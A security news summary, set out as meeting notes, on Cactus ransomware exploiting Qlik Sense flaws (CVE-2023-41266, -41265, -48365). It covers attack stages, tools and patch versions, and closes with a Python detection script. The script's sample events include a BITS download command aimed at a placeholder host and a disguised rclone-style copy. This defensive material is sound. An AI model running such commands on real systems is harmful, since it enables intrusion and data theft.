Cactus ransomware exploiting Qlik Sense flaws to breach networks

November 30, 2023 at 02:06PM

Cactus ransomware targets Qlik Sense analytics platform vulnerabilities for network access, exploiting unpatched systems to gain control, download tools, and deploy ransomware. Updates have been released to address critical flaws; users are advised to install designated patches. Arctic Wolf reports Cactus uses advanced techniques for persistence, lateral movement, and data exfiltration.

Meeting Takeaways:

1. **Cactus Ransomware Exploits**: The Cactus ransomware is actively exploiting critical vulnerabilities in the Qlik Sense data analytics platform to gain initial access to corporate networks.

2. **Qlik Sense Vulnerability Details**:
– Vulnerabilities were found in the Windows version of Qlik Sense.
– The path traversal bug, CVE-2023-41266, allows for anonymous sessions and unauthorized HTTP requests.
– Another critical vulnerability, CVE-2023-41265 (CVSS score 9.8), enables privilege escalation and unauthenticated HTTP requests to the backend server. The initial fix was incomplete, and the issue was reissued as CVE-2023-48365.

3. **Ransomware Attack Methodology**:
– Code execution through Qlik Sense Scheduler service using PowerShell and BITS.
– Downloading of persistence tools and remote access tools, disguising them as legitimate files.
– Attack patterns include uninstalling antivirus, altering admin passwords, and RDP tunneling for concealment and lateral movement.
– Deployment of the Cactus ransomware in the final attack stage.

4. **Tools and Techniques Observed**:
– Execution of discovery commands, with their output written to .TTF files.
– Lateral movement via RDP, disk space analysis via WizTree, and data exfiltration using rclone disguised as ‘svchost.exe’.
– Consistency with previous Cactus ransomware attacks.

5. **Mitigation Recommendations by Qlik**:
– Upgrading Qlik Sense Enterprise for Windows to one of the following patch versions: August 2023 Patch 2, May 2023 Patch 6, February 2023 Patch 10, November 2022 Patch 12, August 2022 Patch 14, May 2022 Patch 16, February 2022 Patch 15, November 2021 Patch 17.

6. **Background on Cactus Ransomware**:
– Emergence in March with a double-extortion approach: data theft followed by encryption.
– Prior exploitation of Fortinet VPN vulnerabilities for network access.
– Kroll researchers note that the ransomware encrypts itself to evade detection by security products, and that it uses AnyDesk, rclone, and batch scripts to disable security measures.

**Action Items**:
– Immediately check if current Qlik Sense installations have been updated to the recommended patches to avoid vulnerability to Cactus ransomware.
– Review and enhance monitoring for the tools and techniques used by the Cactus ransomware, including unusual PowerShell and BITS activity and exfiltration attempts.
– Consider informing the cybersecurity team about the report from Arctic Wolf and ensuring that network defenses can detect and prevent such ransomware tactics.
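A small detection pass, added here as an example and not part of the Arctic Wolf or Qlik material, that checks process-creation records for three behaviours the summary lists (items 3 and 4, and the monitoring action item): PowerShell or BITS spawned by the Qlik Sense Scheduler service, an svchost.exe running outside the Windows system directories, and command output redirected into a .TTF file. The Scheduler.exe path, the rule names and all sample events are assumptions constructed for this example.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """One process-creation record (e.g. Sysmon Event ID 1 fields), constructed for this example."""
    parent_image: str
    image: str
    cmdline: str

# Assumption: the Qlik Sense Scheduler service runs as Scheduler.exe under the Qlik install path.
QLIK_SCHEDULER_RE = re.compile(r"\\Qlik\\Sense\\Scheduler\\Scheduler\.exe$", re.I)
LOLBIN_RE = re.compile(r"\\(powershell|pwsh|bitsadmin)\.exe$", re.I)
BITS_CMD_RE = re.compile(r"Start-BitsTransfer|bitsadmin(\.exe)?\s+/transfer", re.I)
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
TTF_REDIRECT_RE = re.compile(r">\s*\"?[^\s\"]+\.ttf\b", re.I)

def detect(ev: ProcEvent) -> list:
    """Return the names of the Cactus-style behaviours this event matches (empty list if none)."""
    findings = []
    # Item 3: PowerShell/BITS launched from the Qlik Sense Scheduler service.
    if QLIK_SCHEDULER_RE.search(ev.parent_image) and (
        LOLBIN_RE.search(ev.image) or BITS_CMD_RE.search(ev.cmdline)
    ):
        findings.append("qlik_scheduler_spawned_powershell_or_bits")
    # Item 4: a binary named svchost.exe outside the Windows system directories (rclone was disguised this way).
    image = ev.image.lower()
    if image.endswith("\\svchost.exe") and not image.startswith(SYSTEM_DIRS):
        findings.append("svchost_outside_system_dir")
    # Item 4: discovery output redirected into a .TTF file.
    if TTF_REDIRECT_RE.search(ev.cmdline):
        findings.append("command_output_redirected_to_ttf")
    return findings

def scan(events):
    """Return (index, findings) for every event that triggered at least one rule."""
    return [(i, f) for i, e in enumerate(events) if (f := detect(e))]

# Constructed sample events; paths and the URL are placeholders, not indicators from the article.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -NoProfile -Command "Start-BitsTransfer -Source http://placeholder.invalid/a -Destination C:\ProgramData\a"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Users\Public\svchost.exe", r"svchost.exe copy C:\Data remote:backup"),
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\cmd.exe", r"cmd.exe /c whoami /all > C:\Windows\Temp\out.ttf"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -NoProfile"),
]
```

Running `scan(SAMPLE_EVENTS)` flags events 0, 1 and 3 and leaves the legitimate svchost.exe and the interactive PowerShell launch alone; in production the rules would be fed from Sysmon or EDR telemetry rather than the inline list.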
